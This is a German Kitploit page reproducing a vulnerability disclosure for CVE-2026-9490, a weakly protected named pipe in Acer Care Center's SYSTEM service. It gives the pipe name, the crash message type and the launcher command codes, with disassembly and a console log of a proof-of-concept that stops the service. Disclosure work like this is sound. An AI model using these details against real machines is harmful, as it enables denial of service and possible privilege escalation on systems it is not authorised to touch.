Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-9490 — The ACCSvc service creates a Named Pipe with a weak Security Descriptor that allows any authenticated user to connect and send messages. When a specially crafted message (message type 0x03) is sent to the pipe, the service crashes with exit code 1067 (ERROR_PROCESS_ABORTED). | Kitploit
Tools/GitHubGitHub/ugvxb/cve-2026-9490
Privilege EscalationVulnerability AnalysisExploitationReverse EngineeringPenetration TestingBinary Analysis
GitHubugvxb/cve-2026-9490

CVE-2026-9490

The ACCSvc service creates a Named Pipe with a weak Security Descriptor that allows any authenticated user to connect and send messages. When a specially crafted message (message type 0x03) is sent to the pipe, the service crashes with exit code 1067 (ERROR_PROCESS_ABORTED).

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-Kennung: CVE-2026-9490
Forscher: Vo Duc Thang (ugvxb)
Danksagung: https://community.acer.com/en/kb/articles/19668

1. Zusammenfassung

Eine kritische Sicherheitslücke wurde im Dienst Acer Care Center (ACCSvc.exe) identifiziert. Die Schwachstelle erlaubt jedem authentifizierten lokalen Benutzer, den Systemdienst zum Absturz zu bringen (Denial of Service) und möglicherweise Privilegien über eine schwach gesicherte Named-Pipe-Schnittstelle zu erhöhen.

Der Dienst, der mit SYSTEM-Berechtigungen (LocalSystem) läuft, stellt eine Named Pipe mit übermäßig freizügigen Zugriffskontrollen bereit, die Lese-, Schreib- und Ausführungsberechtigungen für alle authentifizierten Benutzer gewährt.


2. Schwachstellendetails

2.1 Betroffene Komponente

AttributWert
ProduktAcer Care Center
KomponenteACCSvc.exe (ACC Service)
DienstnameACCSvc
InstallationspfadC:\Program Files (x86)\Acer\Care Center\
DienstkontoLocalSystem (NT AUTHORITY\SYSTEM)
StarttypAUTO_START
Named Pipe\.\pipe\treadstone_service_LightMode

2.2 Schwachstelle #1: Denial of Service

Beschreibung

Der ACCSvc-Dienst erstellt eine Named Pipe mit einem schwachen Sicherheitsdeskriptor, der es jedem authentifizierten Benutzer erlaubt, eine Verbindung herzustellen und Nachrichten zu senden. Wenn eine speziell präparierte Nachricht (Nachrichtentyp 0x03) an die Pipe gesendet wird, stürzt der Dienst mit dem Exit-Code 1067 (ERROR_PROCESS_ABORTED) ab.

Sicherheitsdeskriptor (SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

SDDL-Analyse

Auswirkungen

Ein Standardbenutzer ohne besondere Berechtigungen kann den Systemdienst ACCSvc beenden, wodurch die Funktionalität von Acer Care Center nicht mehr verfügbar ist.

2.3 Schwachstelle #2: Potenzielle lokale Privilegienausweitung

Beschreibung

Dieselbe schwache Named-Pipe-ACL erlaubt authentifizierten Benutzern das Senden von Befehlsnachrichten, die den Dienst veranlassen, Launcher-Anwendungen über CreateProcessAsUserW auszuführen.

Befehlscodes

BefehlHex-WertZiel-Ausführbare Datei
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. Technische Analyse

3.1 Binäranalyse

AttributWert
DateiACCSvc.exe
TypPE32+ executable (console) x86-64
AnalysetoolRadare2

3.2 Identifizierte Schlüsselfunktionen

3.3 Parameter zur Erstellung der Named Pipe

root@kitploit:~
Pipe Name:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:       0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:       0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:    255
nOutBufferSize:   512
nInBufferSize:    512
nDefaultTimeOut:  1000ms

3.4 Befehlsverteilungslogik

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Read command
0x140008b1d      lea eax, [rbx - 0x19065]       ; Subtract base
0x140008b23      cmp eax, 2                      ; Check range
0x140008b26      ja  0x140008bde                 ; Jump if invalid

4. Exploitationsergebnisse

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Ergebnis: Standardbenutzer hat erfolgreich den SYSTEM-Dienst zum Absturz gebracht!


5. Risikobewertung

5.1 CVSS v4.0-Score

MetrikWert
CVSS 4.0-VektorAV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
CVSS-Basiswert6.8 (Mittel)

5.2 CWE-Klassifikationen

CWE-IDName
CWE-269Unsachgemäßes Privilegienmanagement

6. Haftungsausschluss

Dieser PoC dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch. Die Ausnutzung ohne Autorisierung ist illegal.

Tool herunterladen
ACEPrinzipalBerechtigungBewertung
(D;OICI;GA;;;BG)Integrierte GästeVERWEIGERN ALLESicher
(D;OICI;GA;;;AN)AnonymVERWEIGERN ALLESicher
(A;OICI;GRGWGX;;;AU)Authentifizierte BenutzerLesen/Schreiben/AusführenANGREIFBAR
(A;OICI;GA;;;BA)Integrierte AdministratorenERLAUBEN ALLEErwartet
Einstiegspunkt
0x14000fd4c
FunktionAdresseZweck
fcn.140009a700x140009a70CreateNamedPipeW - Erstellt angreifbare Pipe
fcn.1400075700x140007570CreateProcessAsUserW - Startet Prozesse
fcn.14000a8a00x14000a8a0ReadFile-Handler
fcn.1400099500x140009950WriteFile-Handler
fcn.1400080500x140008050Nachrichtenverteiler